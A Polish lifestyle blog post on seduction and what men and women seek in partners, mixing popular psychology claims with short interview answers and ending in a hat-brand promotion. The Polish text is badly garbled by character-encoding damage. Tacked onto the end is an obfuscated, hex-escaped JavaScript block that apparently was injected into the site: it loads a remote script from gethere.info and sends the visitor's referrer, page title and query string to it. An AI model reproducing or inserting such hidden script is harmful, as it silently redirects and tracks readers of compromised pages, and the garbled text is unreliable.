SzkoA�a uwodzenia, czy to dziaA�a?

opublikowane w Najnowsze Wpisy, Psychologia | 0

SzkoA�a uwodzenia. Na pytanie o to, co jest najwaA?niejsze w A?yciu, pewnie wielu z nas odpowie, A?e miA�oA�A�. Nic wiA�c dziwnego, A?e jest ona przedmiotem licznych badaA� i refleksji. Dzisiaj chciaA�abym siA� skupiA� na jej poczA�tkowym etapie. Jak siA� dobieramy? Co sprawia, A?e wA�aA�nie ta osoba jest dla nas atrakcyjna, a inna nie? Czego kobiety chcA� od mA�A?czyzn, a mA�A?czyA?ni od kobiet i czy faktycznie oczekiwania aA? tak siA� rA?A?niA�? I wreszcie – co robimy, gdy juA? wiemy, A?e to wA�aA�nie ta osoba, a ona jeszcze o tym nie wiea�� Czy tylko mA�A?czyzna ma prawo wyjA�A� z inicjatywA�? Okazuje siA�, A?e kobiety coraz czA�A�ciej biorA� sprawy w swoje rA�ce, zgodnie z zasadA�, A?e a�zto kobieta wybiera mA�A?czyznA�, ktA?ry jA� wybierzea�?, ktA?rA� oczywiA�cie sama wyznajA�.

Istnieje wiele badaA� odpowiadajA�cych na powyA?sze pytania, ktA?re Wam przytoczA�. Tym razem jednak postanowiA�am zabawiA� siA� w Carrie z „Seksu w wielkim mieA�cie” i zrobiA� wA�asny maA�y research w tej sprawie.

logohelenmoda

SzkoA�a uwodzenia.A�Czego mA�A?czyA?ni chcA� od kobiet?

Podstawowa idea teorii strategii doboru partnera Davida Bussa jest taka, A?e kobiety czegoA� innego chcA� od mA�A?czyzn niA? mA�A?czyA?ni od kobiet. Wiele badaA� potwierdza obiegowe przekonanie, A?e dla mA�A?czyzn liczy siA� przede wszystkim wyglA�d, a dla kobiet pieniA�dze. Czy tak faktycznie jest?

Z perspektywy psychologii ewolucyjnej dobieramy sobie partnera o cechach najbardziej korzystnych w dalszym procesie reprodukcji. I tak u mA�A?czyzn preferowane sA�: symetria ciaA�a (oznaczajA�ca brak zaburzeA� rozwojowych), szczegA?lnie poA?A�dana jest figura w ksztaA�cie litery V (szerokie ramiona, wA�skie biodra); wysoki wzrost, silne ciaA�o, zasoby finansowe oraz wysoki status spoA�eczny. JeA�li chodzi o kobiety, bazA� ich atrakcyjnoA�ci sA� proporcje ciaA�a i symetria rysA?w twarzy. OprA?cz tego znamionami urody sA� takA?e: wciA�cie w talii, szerokie biodra, peA�ne usta czy bA�yszczA�ce wA�osy. SA�ynny wskaA?nik WHR 0,7-0,6 (obwA?d talii w centymetrach podzielony przez obwA?d bioder) to oznaka zdrowia i posiadania dobrych genA?w. Jak siA� okazuje mA�A?czyA?ni odczytujA� go bezbA�A�dnie. Badania pokazaA�y, A?e odbierajA� go takA?e niewidomi. W badaniu przeprowadzonym w 2010 roku poproszono niewidomych mA�A?czyzn o dotkniA�cie manekinA?w o rA?A?nym WHR. AtrakcyjnoA�A� tego o wskaA?niku 0,7 ocenili najwyA?ej. Podobnie jest z symetriA� rysA?w.

SzkoA�a uwodzenia. ZarA?wno mA�A?czyA?ni jak i kobiety majA� obsesjA� na punkcie wyglA�du fizycznego, ale zawsze chodzi o wyglA�d kobiet. MA�A?czyA?ni znacznie czA�A�ciej niA? kobiety poA?A�dajA� u pA�ci przeciwnej urody, a rA?A?nica ta wystA�pujA� w wiA�kszoA�ci kultur. Kobiety natomiast poA?A�dajA� urody wA�asnej i dla jej poprawienia sA� w stanie wiele znieA�A�. WedA�ug psycholog Amy Alkon, mit piA�kna to nie mA�ski wymysA� w celu uprzedmiotowienia kobiety. Kanony urody A�ciA�le uwarunkowane sA� kulturowo i nie sA� wcale zjawiskiem nowym. MA�A?czyA?ni wprost uwielbiajA� atrakcyjne kobiety. Fizycznie, psychicznie i intelektualnie. MA?wi siA� nawet, A?e kobieta jest wizytA?wkA� mA�A?czyzny. Dlaczego? Bo jej uroda go nobilituje i dowartoA�ciowuje w A�wiecie zewnA�trznym. Najlepiej, jeA�li podoba siA� nie tylko jemu, ale takA?e konkurencji. „Bardzo rajcuje ich zachwyt innych mA�A?czyzn, gdy patrzA� na ich towarzyszkA�. Wtedy rosnA�, bo kobieta u ich boku jest najlepszA� reklamA� ich moA?liwoA�ci” a�� mA?wi terapeutka Katarzyna Platowska.A�Podobnie jest z mA�skA� obsesjA� na punkcie mA�odoA�ci. Badania prof. Wojciszke pokazujA�, A?e mA�A?czyA?ni najbardziej zafiksowani sA� na a�zdwudziestkacha�?, czyli kobietach w najbardziej pA�odnym wieku. TA� grupA� wiekowA� wybierajA� zarA?wno 15-latkowie (czyli poA?A�dajA� kobiet starszych od siebie) jak i 40-latkowie.

SzkoA�a uwodzenia. Czego poza atrakcyjnoA�ciA� i mA�odym wiekiem szukajA� mA�A?czyA?ni? Badania przeprowadzone przez prof. Wojciszke, dr. WiesA�awa BaryA�A� oraz AnnA� Downar pokazaA�y, A?e mA�A?czyA?ni najczA�A�ciej szukajA� partnerek atrakcyjnych, miA�ych, czuA�ych oraz szczupA�ych. Bardzo wysoko ocenianA� kategoriA� jest teA? wiernoA�A� oraz podziw dla mA�A?czyzny.Jak tA�umaczy psycholog Katarzyna Platowska,A�wspA?A�czeA�ni mA�A?czyA?ni sA� wiecznie zabiegani, podejmujA� siA� wielu dziaA�aA� i wyzwaA� zawodowych. Kobiety nie zawsze dostrzegajA� wszystkie waA?ne dla partnera sprawy. A mA�A?czyzna ma silnA� potrzebA� bycia docenionym. Kiedy kobieta podziwia swojego partnera za jego starania dla rodziny, kiedy docenia jego wysiA�ek i wkA�ad w zwiA�zek, sprawia tym samym, A?e stara siA� on jeszcze bardziej. Znany psycholog, badacz mikroekspresji Paul Ekman twierdzi, A?e mA�A?czyA?ni nieA�wiadomie uznajA� za atrakcyjne kobiety, ktA?rym na ich widok powiA�kszajA� siA� A?renice, bo jest to sygnaA� zainteresowania i zachwytu. „MA�A?czyA?niA�A�lubiA� siA� takA?e czuA� potrzebni. WiA�kszoA�A� z nich pragnie, by kobieta widziaA�a w nich bohatera, kogoA�, kto poradzi sobie z czymA�, z czym nie radzi sobie ona sama i inni mA�A?czyA?ni” – mA?wi Katarzyna Platowska. Jednak okazuje siA�, A?e mA�A?czyA?ni w kobietach szukajA� przede wszystkim… kobiecoA�ci.A�”MA�A?czyA?ni szukajA� partnerek czuA�ych, wraA?liwych i opiekuA�czych” – mA?wi A�psycholog Adriana Klos.A�Odpowiedzialna, troskliwa, czuA�a, szczera, seksowna, delikatna, wraA?liwa i uczciwa a�� to najbardziej poA?A�dane cechy kobiety wedA�ug polskich internautA?w, biorA�cych udziaA� w badaniu portalu MyDwoje.pl.

SzkoA�a uwodzenia. Co na ten temat powiedzieli pytani przeze mnie mA�A?czyA?ni?

Marcin, lat 29:A�a�zCzego szukam w kobietach? Inteligencji, klasy, stylu, mocnego charakteru, piA�knych oczu, odpornoA�ci na trudne sytuacje, pasji, wytrwaA�oA�ci w dA�A?eniu do celua�?

Bartosz, 35: a�zNa pewno szukam w kobietach tego, czego ja chcA� od A?ycia. Podobnych celA?w, uczuciowoA�ci, stabilizacji, poczucia humoru, lojalnoA�ci wobec innych, szacunku do rodziny.a�?

Artur, lat 25: a�zCzego szukam w kobietach? Hmma�� PiA�kna, wraA?liwoA�ci, inspiracji, pasji do tego co robi, energii do zdobywania A�wiata, przyjaciela i na koA�cu jeszcze duA?o energii do rozA�adowania.a�?

Maciek, lat 26: „Szukam kobiety z dA�ugim jA�zykiem i obfitym biustem. DA�ugi jA�zyk ze wzglA�du na rozmowy do rana, a biust A?eby wykarmiA� wszystkie dzieci. A tak na serio, to niczego konkretnego nie szukam. KaA?da kobieta ma indywidualny zestaw cech, ktA?ry albo mnie pociA�ga, albo odpycha.a�?

Adam, lat 25: a�zSzukam w kobietach inteligencji, mA�droA�ci, zaradnoA�ci i wspA?lnych zainteresowaA�.a�?

PaweA�, lat 28: „Przede wszystkim szukam kobiety, ktA?ra bA�dzie mnie tak samo interesowaA�a, rozA�mieszaA�a i pociA�gaA�a za 5, 10, 15 lat, jak na poczA�tku zwiA�zku. Jakby do tego byA�a dla mnie wsparciem i dodatkowA� motywacjA� do dziaA�ania byA�oby A�wietnie. I wielkich cyckA?w.”

Mateusz, 31: „W kobiecie szukam tylko wyjA�tkowych cech, unikatA?w. LubiA� kobiety pewne siebie, ale z klasA�.”

SzkoA�a uwodzenia. Czego kobiety chcA� od mA�A?czyzn?

MA?wi siA�, A?e pieniA�dze to viagra dla kobiet. Jednak wcale nie chodzi tutaj o pieniA�dze same w sobie. Wszystko sprowadza siA� do poczucia bezpieczeA�stwa.A�Badania Bussa i Shmitt (1993) pokazujA�, A?e mA�A?czyA?ni mocno rA?A?niA� siA� od kobiet w kwestii zwiA�zkA?w krA?tkotrwaA�ych – kobiety nie sA� nimi zainteresowane, mA�A?czyA?ni zaA� – wrA�cz przeciwnie. Kobiety sA� nastawione na znalezienie staA�ego partnera.A�To one przecieA? rodzA� i wychowujA� dzieci. Dlatego teA? szukajA� w mA�A?czyznach cech kwalifikujA�cych ich do roli dobrego ojca, rodzinnego, staA�ego w uczuciach, zapewniajA�cego poczucie bezpieczeA�stwa i stabilizacjA�, a co za tym idzie – gwarantujA�cego zabezpieczenie finansowe. Czego jeszcze szukajA� kobiety? Zdecydowanie poczucia, A?e sA� na pierwszym miejscu, w centrum uwagi mA�A?czyzny. Maniery takie jak: otwieranie przed niA� drzwi, podanie pA�aszcza, poniesienie czegoA� ciA�A?kiego a�� to zawsze mile widziane gesty. Jak twierdzi psycholog Katarzyna Platowska, kobiety szukajA� wszelkich oznak zaangaA?owania mA�A?czyzny, bo oczekujA� od niego wziA�cia odpowiedzialnoA�ci za niA� i za zwiA�zek. Kobieta potrzebuje, by okazywaA� jej uczucia na wiele sposobA?w: pamiA�tajA�c o urodzinach, dajA�c kwiaty, wrA�czajA�c A�prezenty, dzwoniA�c… To jA� upewnia, A?e jest traktowana powaA?nie. OprA?cz tego kobiety potrzebujA� ciA�gA�oA�ci w okazywaniu uczuA�, staA�ego podtrzymywania kontaktu, zapewnieA� miA�oA�ci.

SzkoA�a uwodzenia. Co odpowiedziaA�y kobiety pytane przeze mnie o to, czego szukajA� u mA�A?czyzn? Oto kilka odpowiedzi:

Kasia, lat 25: a�zSzukam kogoA� z poczuciem humoru, dobrego sA�uchacza i kogoA�, kto zapewni mi poczucie bezpieczeA�stwa. Silne, mA�skie ramiA�.a�?

Monika, lat 25 a�zCzego szukam? Musi byA� przystojny, zaradny, mieA� poczucie humoru.A� KiedyA� miaA�am bogatego i go zostawiA�am bo nie wiedziaA�am, skA�d to ma, jak jakiA� zA�odzieja��a�?

Hania, lat 21: a�zSzukam bezpieczeA�stwa, ciepA�a i stabilizacji.a�?

Iwona, lat 24: a�zSzukam bliskoA�ci, ale bliskoA�ci tylko na chwilA�, bo angaA?owaA� siA� na powaA?nie to nie dla mnie, przynajmniej na tym etapie w A?yciu. ChociaA? z przykroA�ciA� muszA� przyznaA�, A?e coraz czA�A�ciej chodzA� mi myA�li po gA�owie, A?eby mieA� kogoA� na staA�e, kto bA�dzie zawsze przy mnie, bA�dzie mnie wspieraA� i z kim bA�dA� mogA�a porozmawiaA� na kaA?dy temat, bA�dzie partnerem w kaA?dej dziedzinie A?ycia. MA�A?czyzna musi byA� silny psychicznie, nie moA?e byA� miA�kkA� fajA�, musi byA� niezaleA?ny, zrA?wnowaA?ony emocjonalnie.a�?

Kornelia, lat 30: a�zCzego szukam? Inteligencji, bezpieczeA�stwa, wraA?liwoA�ci.a�?

Ola, lat 28: „Szukam poczucia bezpieczeA�stwa, wsparcia, zrozumienia, czuA�oA�ci. ChciaA�abym, A?eby mA?j partner byA� moim najlepszym przyjacielem.”

SzkoA�a uwodzenia.


SzkoA�a uwodzenia.

SzkoA�a uwodzenia.A�Wielu mA�A?czyzn szuka w kobietach matczynego elementu. Bywa, A?e bardziej uwodzi zawiA�zanie krawata niA? miA�e sA�owo. CiepA�o, empatia, troskliwoA�A� kojarzA� siA� mA�A?czyznom z kobiecoA�ciA� i sA� okreA�lane przez nich w badaniach jako waA?ne i poA?A�dane. To dlatego lubiA�, gdy kobieta siA� nimi opiekuje, okazuje troskA�, dba o zaspokajanie potrzeb.A�Badania amerykaA�skich uczonych ze Stanford Graduate School of Business, pokazaA�y, A?e gdy kobieta lekko dotknie mA�A?czyzny, zaledwie muskajA�c jego ramiA�, staje siA� on podatny na ryzykowne zachowania. Badacze tA�umaczA�, A?e dotyk na poziomie biologicznym przypomina mA�A?czyznom dotyk matki i sprawia, A?e czujA� siA� bezpieczniej. I to chwilowe poczucie bezpieczeA�stwa pozwala im ryzykowaA�.

A co z powszechnie znanA� metodA� grania niedostA�pnej? Podobno to jest juA? passe, okazuje siA� bowiem, A?e jest nieskuteczne. Jak mA?wi Konrad Bocian, kiedy mA�A?czyA?ni spotykajA� kobietA� trudnA� do zdobycia, bardzo szybko rezygnujA�. Czego siA� obawiajA�? Odrzucenia, upokorzenia. PamiA�tajmy o tym, A?eA�mA�A?czyA?ni sA� silni gA�A?wnie fizycznie. Emocjonalnie jednak czA�sto sA� sA�absi od kobiet. „Kiedy mA�A?czyA?ni widzA� piA�knA� kobietA�, trochA� jej poA?A�dajA�, a trochA� siA� obawiajA� a�� bo co bA�dzie, jeA�li ich odrzuci? A�Tego ich ego nie zniesie!”- mA?wi psycholog Katarzyna Platkowska.

Jak mA?wi Konrad Bocian, kobiety dziA� czA�sto przenoszA� z pracy pewien sposA?b rozmowy z mA�A?czyznami, nastawiony na wygranA� w dyspucie. Ale zachowania, ktA?re mogA� byA� opA�acalne w pracy, sA� zupeA�nie nieopA�acalne w A?yciu prywatnym, gdzie bardziej niA? racje liczA� siA� emocje. Nie moA?na kogoA� uwieA�A�, dyskredytujA�c go czy okazujA�c mu swojA� wyA?szoA�A�. ZwA�aszcza publicznie. MoA?e to obudziA� niechA�A�, niepewnoA�A�. Nieraz poA?A�danie, ale bez czuA�oA�ci, bo pod spodem jest chA�A� odwetu. Podobnie jest z publicznA� krytykA�, zA�oA�liwoA�ciami. MA�A?czyA?ni odbierajA� to jako brak szacunku, a on jest dla nich bardzo waA?ny.

SzkoA�a uwodzenia.A�Jakie sA� sposoby na uwodzenie stosowane przez moich rozmA?wcA?w?

Marcin, lat 25: a�zJak uwieA�A� kobietA�? ByA� sobA�, nie udawaA�, sA�uchaA� i rozumieA� co kobieta mA?wi. Ja mam bardzo swobodne kontakty z kobietami – coA�, co dla mnie jest niewinnym flirtem bez A?adnego zamiaru, dla innego faceta bA�dzie podrywem. Z drugiej strony, ja nie mam A?adnych sposobA?w na uwodzenie, bo to nie o to chodzi – jak ma coA� byA�, to bA�dzie, A?adne sztuczki i bajery nie pomogA� chemii. I inna kwestia – nigdy nie poderwaA�em dziewczyny tylko po to, A?eby poderwaA� – albo szalejA� na punkcie dziewczyny, albo daruje sobie w kaA?dej materii.”

Tomasz, lat 28:A� a�zSposA?b na uwiedzenie kobiety? SA�uchaA�, zadawaA� pytania. Samym jA�zykiem, ktA?rego uA?ywamy zdradzamy na czym nam zaleA?y.a�?

Maciek, lat 26: a�zNie mam A?adnego sposobu. Staram siA� byA� sobA� i czasami to dziaA�a, a czasami nie.a�?

Iwona, lat 24: a�zJa uwaA?am, A?e nie uwodzA� mA�A?czyzn, ale oni twierdzA�, A?e wrA�cz przeciwnie. Zazwyczaj wystarczy, A?e siA� uA�miechnA� i wiA�cej nie muszA� robiA�. To dziaA�a najlepiej na A?onatych facetA?w, choA� na wolnych teA?.a�?

Monika, lat 25:A�a�zStaram siA� zagA�A�biA� w to, czym dany facet siA� interesuje i co lubi. JeA�li jest tego wart staram siA� nawet nabyA� wiedzA� na temat, ktA?ry go interesuje, aby mu zaimponowaA�. W ten sposA?b on sam zaczyna o mnie zabiegaA�, potem gdy nawiA�zuje siA� chemia, on zapomina o tych maA�ych kA�amstwach. Nie jestem typem kokietki. Jak wiem, A?e on lubi koka, kitkA�, loki, to tak siA� uczeszA�, jeA�li lubi czerwone szpilki, to je ubiorA�, ale ciA�gle udajA�c, A?e nikogo nie podrywam.”

Hania, lat 24: a�zNie ma uniwersalnego sposobu na uwiedzenie mA�A?czyzny. Kluczem jest dobranie klucza do ofiary.”

Kasia,lat 25: a�zPo wypiciu odpowiedniej dawki alkoholu, podkrA�ceniu rzA�s, ruszam na parkiet niczym dzika kotka.a�?

Artur,lat 25: a�zSposA?b na uwiedzenie dziewczyny… MyA�lA�, A?e nie mam jakiegoA� konkretnego. Kiedy dziewczyna mi siA� podoba, to staram siA� poA�wiA�ciA� jej jak najwiA�cej uwagi, sA�uchaA� co ma do powiedzenia i byA� miA�ym, zabawnym. Staram siA� pokazaA�, A?e mi zaleA?y, wiec zapraszam na kawA� albo na spacer. Raczej nie mam A?adnych trikA?w (przynajmniej w takiej poczA�tkowej fazie).a�?

Maciej, lat 34: a�zUwodzA� kobiety z reguA�y przez zaskoczenie, kobiety lubiA� niespodzianki. Wydaje mi siA�, A?e kobiety, ktA?re chcA� byA� uwodzone z automatu, sA� nie w moim stylu. Zawsze bA�dA�c sobA�, poznajA�c mnie bliA?ejA� samoistnie wszystko siA� odbywaA�o. Uwodzenie kojarzy mi siA� z czymA�, co z reguA�y prowadzi prostA� drogA� do seksu, a bez upewnienia siA�, A?e kobieta mi odpowiada z intelektualnej strony, zachowania, empatii do ludzi itp, byA�a dla mnie aseksualna.a�?

Adam,lat 25: a�zJak uwieA�A�? A�art, daA� poczucie bezpieczeA�stwa i pokazaA�, A?e jest w centrum zainteresowania. Tyle styka, by mieA� zaklepane drugie spotkanie.a�?,

Kornelia, lat 35: a�z Jak uwodzA�? InteligentnA� rozmowA�.a�?

Mateusz, lat 31: a�z Nigdy nie miaA�em problemA?w z uwodzeniem, wystarczyA�a zwyczajna rozmowa. Nigdy nie sprzedajA� tych samych tekstA?w, ale jestem dobrym sA�uchaczem. Nigdy teA? nie nastawiam siA� na coA� wiA�cej w relacjach, jak bA�dzie tak bA�dzie.a�?

PaweA�, lat 28: „Nie uwodzA� – albo jest chemia, albo jej nie ma. Jak jest chociaA? odrobinka, to bycie sobA� powinno zrobiA� robotA� (bo nie chcA�, A?eby byA�a ze mnA� myA�lA�c, A?e jestem kimA� innym).

SzkoA�a uwodzenia.A�Jak widzicie nie ma jednego skutecznego sposobu. KtoA� z Was zadaA� mi te same pytania, ktA?re ja zadawaA�am Wam. A�eby byA�o sprawiedliwie – odpowiem. Nie bawiA� siA� w uwodzenie, bo nie potrafiA� tego robiA�, choA� czasem bym chciaA�a. JeA�li chodzi o to, czego szukam u mA�A?czyzn odpowiem doA�A� sztampowo: poczucie bezpieczeA�stwa, lojalnoA�A�, inteligencja, wraA?liwoA�A� – to zestaw podstawowy. A zestaw idealny to temat rzeka. Tak wiA�c tyle o mnie. Przyznam, A?e nieA?le siA� ubawiA�am, czytajA�c niektA?re z Waszych odpowiedzi i z chA�ciA� posA�uchaA�abym wiA�cej! Dlatego piszcie A�miaA�o: jakie sA� wasze sposoby na zdobycie partnera? Czego szukacie u pA�ci przeciwnej? ZachA�cam do dyskusji i dziA�kujA� wszystkim, ktA?rzy poA�wiA�cili mi chwilA�, A?eby porozmawiaA� i dziA�ki ktA?rym ten artykuA� powstaA�.

ZostaA� uwiedziona nakryciami gA�owy marki Porthos Helen Moda, specjalna wiosenna oferta dostA�pna Tu.

Esklepvar _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}